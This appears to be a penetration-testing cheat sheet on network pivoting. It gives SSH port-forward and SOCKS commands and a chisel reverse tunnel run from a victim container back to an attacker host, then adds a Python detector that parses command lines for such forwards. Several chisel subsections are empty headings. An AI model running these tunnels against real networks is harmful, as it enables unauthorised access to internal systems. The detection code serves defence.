👾Pivot

How to access more subnets.

Port Forwarding

Using SSH

To access a locally exposed service on a remote machine:

ssh -L YOUR_PORT:localhost:PORT_EXPOSED USERNAME@IP_ADDRESS

Using chisel

To redirect a port (here, 3000) from inside a Docker container, for example (victim = 172.17.0.1 and your host = 10.10.16.8), first run a chisel server on your host:

./chisel server -p 5555 --reverse

Then, from inside the Docker container, run the client so that the victim machine's port is redirected to your host:

./chisel client 10.10.16.8:5555 R:8890:172.17.0.1:3000

Then you can access the service with http://localhost:8890/.

SOCKS Tunnels

SSH

ssh -D 1080 -q -N -i id_rsa USERNAME@IP_ADDRESS

Chisel

Best tool ever for pivoting. Just launch one server on your host and as many clients as you wish on different victim machines. Get the latest version, which exists for Linux and Windows: https://github.com/jpillora/chisel.

On the attacking machine (Kali):

On the victim machine:

Then you can chain SOCKS proxies:

And do not forget to modify your proxychains config file to use the SOCKS you want.
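
On a monitored host, every forward shown on this page is visible in the process command line. The following is an added example, not part of the original page: it parses constructed command lines in the ssh -L, ssh -D and chisel client R: forms used above and reports the listener port and the forwarded target. The sample addresses and ports and the names classify and parse_spec are assumptions.

```python
import re
import shlex

# [bind:]listen_port:target_host:target_port, shared by ssh -L/-R and chisel remotes
SPEC = re.compile(r"^(?:[^:]+:)?(\d+):([^:]+):(\d+)$")
# ssh flag cluster ending in L, R or D; the prefix lists ssh's argument-less flags
SSH_FWD = re.compile(r"^-[46AaCfGgKkMNnqsTtVvXxYy]*([LRD])(.*)$")
SSH_KIND = {"L": "local-forward", "R": "remote-forward"}

# Constructed sample command lines (user, addresses and ports are placeholders)
SAMPLE = [
    "ssh -L 8080:localhost:3000 user@192.0.2.10",
    "./chisel client 10.10.16.8:5555 R:8890:172.17.0.1:3000",
    "ssh -qND 1080 -i id_rsa user@192.0.2.10",
    "ssh user@192.0.2.10",
]


def parse_spec(spec):
    """Return (listen_port, 'host:port'), or (None, spec) when the spec is not recognised."""
    m = SPEC.match(spec)
    return (int(m.group(1)), f"{m.group(2)}:{m.group(3)}") if m else (None, spec)


def classify(cmdline):
    """Return one finding per port forward or SOCKS listener requested on a command line."""
    argv = shlex.split(cmdline)
    tool = argv[0].rsplit("/", 1)[-1] if argv else ""
    out = []
    if tool == "ssh":
        for i, arg in enumerate(argv):
            m = SSH_FWD.match(arg)
            if not m:
                continue
            # The value is either glued to the flag (-L8080:...) or the next argument
            spec = m.group(2) or (argv[i + 1] if i + 1 < len(argv) else "")
            if m.group(1) == "D":  # -D [bind:]port opens a SOCKS listener
                port = spec.rsplit(":", 1)[-1]
                listen, target, kind = (int(port) if port.isdigit() else None), None, "socks"
            else:
                (listen, target), kind = parse_spec(spec), SSH_KIND[m.group(1)]
            out.append({"tool": tool, "kind": kind, "listen": listen, "target": target})
    elif tool == "chisel" and "client" in argv:
        for arg in argv[argv.index("client") + 1:]:
            prefix, spec = ("reverse-", arg[2:]) if arg.startswith("R:") else ("", arg)
            if spec.endswith("socks"):
                out.append({"tool": tool, "kind": prefix + "socks", "listen": None, "target": None})
            elif SPEC.match(spec):
                listen, target = parse_spec(spec)
                out.append({"tool": tool, "kind": prefix + "forward", "listen": listen, "target": target})
    return out
```

Feed classify() the command-line field from process-creation telemetry (for example auditd execve records or EDR process events). A renamed binary is not matched by this name-based check.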
